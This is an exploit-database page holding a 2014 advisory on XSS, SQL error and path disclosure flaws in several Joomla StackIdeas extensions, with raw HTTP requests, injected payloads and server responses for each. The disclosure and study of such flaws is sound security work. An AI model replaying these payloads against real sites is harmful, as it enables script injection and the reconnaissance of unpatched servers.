0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla StackIdeas Extensions Multiple Vulnerabilities
#Title: Joomla StackIdeas Extensions Multiple Vulnerabilities #Date: 01.23.2014 #Vendor: stackideas.com / extensions.joomla.org/extensions/owner/jack-2Estackideas #Demo: demo.stackideas.com #Contant: smash[at]devilteam.pl #Note: Tests were performed without an user account, there is a high probability that there's more vulnerabilities. Affected extensions: - SectionEx - Komento - Easy Discuss - Easy Blog - Easy Social #SectionEx - demo.stackideas.com/sectionex - Version 2.5.104 (Latest ATM) 1. Cross Site Scripting in Search Bar Request (filter_title): POST /sectionex HTTP/1.1 Host: demo.stackideas.com filter_title=666" onmouseover=alert(666) bad="&task=§ionid=2&filter_order=&filter_order_Dir= Request (filter_oreder_Dir): POST /sectionex HTTP/1.1 Host: demo.stackideas.com filter_title=666&task=§ionid=2&filter_order=&filter_order_Dir=" xssed=true bad=" filter_order_Dir is an hidden input parameter: <input type="hidden" id="filter_order_Dir" name="filter_order_Dir" value="" xssed=true bad="" /> 2. Full Path Disclosure in Search Bar POST /sectionex HTTP/1.1 Host: demo.stackideas.com filter_title[]=XSS&task[]=&task[]=§ionid[]=2&filter_order[]=&filter_order_Dir[]= Error: Warning: strtolower() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_sectionex/models/category.php on line 649 #Komento - demo.stackideas.com/komento - Version 1.7.3 (Latest ATM) 1. Persistent Cross Site Scripting - Post Comment POST /?option=com_komento HTTP/1.1 Host: demo.stackideas.com tmpl=component&format=ajax&no_html=1&component=com_content&cid=2&comment=a&parent_id=0&name=666&email=&website=&subscribe=false&latitude=666&longitude=" onmouseover=alert(666) bad="&address=&contentLink=http%3A%2F%2Fdemo.stackideas.com%2Fkomento%2F2-starting-up-a-joomla-blog-with-easyblog&pageItemId=435&option=com_komento&namespace=site.views.komento.addcomment&80a1a7163a3f7e15ed93a3aeaf5abe37=1 You are able to inject code while adding custom Google Location. Href is displayed next to your nick-name: <i></i><a href="http://maps.google.com/maps?z=15&q=666" onmouseover=alert(666) bad="" target="_blank">666</a> 2. SQL Error Request: POST /?option=com_komento HTTP/1.1 Host: demo.stackideas.com tmpl=component&format=ajax&no_html=1&component=com_content&cid=SUP&total=2&option=com_komento&namespace=site.views.komento.checknewcomment&c1403db176705ee19ee8b32f4257b2dc=1 Response: HTTP/1.1 500 Internal Server Error Date: Wed, 22 Jan 2014 20:31:01 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Status: 1054 Unknown column 'SUP' in 'where clause' SQL=SELECT COUNT(1) FROM `jos_komento_comments` WHERE `component` = 'com_content' AND `cid` = SUP AND `published` = '1' Cache-Control: no-cache Pragma: no-cache Content-Length: 6325 Connection: close Content-Type: text/html; charset=utf-8 3. Full Path Disclosure - POST format POST /?option=com_komento HTTP/1.1 Host: demo.stackideas.com tmpl=component&format=666&no_html=1&option=com_komento&namespace=site.views.komento.shortenLink&17de86dda6e238e378e6208aa3d5467a=1 Response: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 20:04:31 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 158 Connection: close Content-Type: text/html; charset=UTF-8 Fatal error: Call to undefined method JDocumentRaw::addCustomTag() in /home/admin/demo.stackideas.com/media/foundry/3.1/joomla/configuration.php on line 111 #Easy Discuss - demo.stackideas.com/easydiscuss - Version 3.2.9289 (Latest ATM) 1. Full Path Disclosure a) Subscribe via email Request: POST /index.php?option=com_easydiscuss&lang=none&tmpl=component&no_html=1&format=ajax&uid=1390488615438 HTTP/1.1 Host: demo.stackideas.com &view=index&layout=ajaxSubscribe&value0=SUP?&value1=0&0767ca009520df2ba9b1b33569fd2d48=1 Error: Invalid template file /home/admin/demo.stackideas.com/components/com_easydiscuss/themes/simplistic/dialogs/ajax.subscribe.SUP?.php b) Language Request: POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1 Host: demo.stackideas.com resource%5B0%5D%5Btype%5D=languageSUP&resource%5B0%5D%5Bname%5D=COM_EASYDISCUSS_TERMS_PLEASE_ACCEPT&resource%5B0%5D%5Bid%5D=Resource07243760213479968'>"><>XSS&resource%5B1%5D%5Btype%5D=language&resource%5B1%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_SUCESSFULLY_ADDED&resource%5B1%5D%5Bid%5D=Resource08769055979183015&resource%5B2%5D%5Btype%5D=language&resource%5B2%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_MORE&resource%5B2%5D%5Bid%5D=Resource0018291907032851662&resource%5B3%5D%5Btype%5D=language&resource%5B3%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOADING_MORE_COMMENTS&resource%5B3%5D%5Bid%5D=Resource034094943220855545&resource%5B4%5D%5Btype%5D=language&resource%5B4%5D%5Bname%5D=COM_EASYDISCUSS_COMMENT_LOAD_ERROR&resource%5B4%5D%5Bid%5D=Resource012465740294232164 Response: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 14:01:06 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 189 Connection: close Content-Type: text/html; charset=UTF-8 Fatal error: Call to undefined method EasyDiscussControllerFoundry::getLanguageSUP() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26 c) Controller Request: POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=SUP&task=getResource Error: HTTP/1.1 500 Internal Server Error Date: Thu, 23 Jan 2014 19:55:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Status: 500 Invalid Controller name "sup".<br /> File "/home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/sup.php" does not exists in this context. Cache-Control: no-cache Pragma: no-cache Content-Length: 6325 Connection: close Content-Type: text/html; charset=utf-8 d) Task Request: POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=SUP Error: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 19:55:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 167 Connection: close Content-Type: text/html; charset=UTF-8 Fatal error: Call to a member function getName() on a non-object in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/controller.php on line 234 e) Resource_type POST /?option=com_easydiscuss&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1 resource%5B0%5D%5Btype%5D=' HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 19:55:36 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 173 Connection: close Content-Type: text/html; charset=UTF-8 Fatal error: Call to undefined method EasyDiscussControllerFoundry::get'() in /home/admin/demo.stackideas.com/components/com_easydiscuss/controllers/foundry.php on line 26 #Easy Blog - demo.stackideas.com/easyblog - Version 3.9.15188 (Latest ATM) 1. Full Path Disclosure - Subscribe to blog Request: POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208 &view=subscription&layout=showForm&value0[]=siteSUP Error: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 20:22:09 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 1847 Connection: close Content-Type: text/html; charset=UTF-8 Warning: ucfirst() expects parameter 1 to be string, array given in /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php on line 50 Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/subscription/view.ejax.php:50) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120 2. Full Path Disclosure - Calendar value0 / value4 / value1 and so on Request: POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512466510 HTTP/1.1 Host: demo.stackideas.com &view=archive&layout=loadCalendar&value0='SUP'%3e%3c&value1=508&value2=small&value3=blog&value4=1391212800 Response: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 20:28:24 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 3067 Connection: close Content-Type: text/html; charset=UTF-8 Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 58 Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 59 Notice: Undefined variable: namespace in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 66 Notice: Undefined variable: preFix in /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php on line 67 Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/archive/view.ejax.php:58) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120 3. Full Path Disclosure - Post a comment Request: POST /index.php?option=com_easyblog&lang=none&Itemid=508&tmpl=component&no_html=1&format=ejax&17de86dda6e238e378e6208aa3d5467a=1&uid=1390512714175 HTTP/1.1 Host: demo.stackideas.com &view=Entry&layout=commentSave&value0[]=title%3D&value0[]=comment%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esusername%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esname%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=esemail%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=url%3D%252526quot%25253B%25253E%25253C%25253EXSS&value0[]=id%3D19&value0[]=parent_id%3D0&value0[]=comment_depth%3D0&value0[]=controller%3Dblog&value0[]=task%3DcommentSave&value0[]=totalComment%3D0&value0[]=%3DSubmit%252520Your%252520Comment Response: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 20:32:34 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 646 Connection: close Content-Type: text/html; charset=UTF-8 Notice: Undefined index: comment in /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php on line 456 Warning: Cannot modify header information - headers already sent by (output started at /home/admin/demo.stackideas.com/components/com_easyblog/views/entry/view.ejax.php:456) in /home/admin/demo.stackideas.com/components/com_easyblog/classes/ejax.php on line 120 [["script","eblog.loader.doneLoading();"],["script","eblog.spinner.hide()"],["script","$(\"#comment\").addClass(\"input-error\");"],["script","eblog.element.focus('comment');"],["script","eblog.comment.displayInlineMsg('error', 'Comment is empty.');"]] #Easy Social - extensions.joomla.org/extensions/clients-a-communities/communities/25616 - Version 1.1.5 (Latest ATM) 1. Full Path Disclosure - resource_type Request: POST /?option=com_easysocial&tmpl=component&no_html=1&controller=foundry&task=getResource HTTP/1.1 Host: demo.stackideas.com resource%5B0%5D%5Btype%5D='%3e"%3e%3cSUP%3e&resource%5B0%5D%5Bname%5D=site%2Fnotifications%2Fsystem.empty&resource%5B0%5D%5Bid%5D=Resource07594590380558889 Response: HTTP/1.1 200 OK Date: Thu, 23 Jan 2014 20:46:32 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 179 Connection: close Content-Type: text/html; charset=UTF-8 Fatal error: Call to undefined method EasySocialControllerFoundry::get'>"><SUP>() in /home/admin/demo.stackideas.com/components/com_easysocial/controllers/foundry.php on line 42 # 0day.today [2024-12-25] #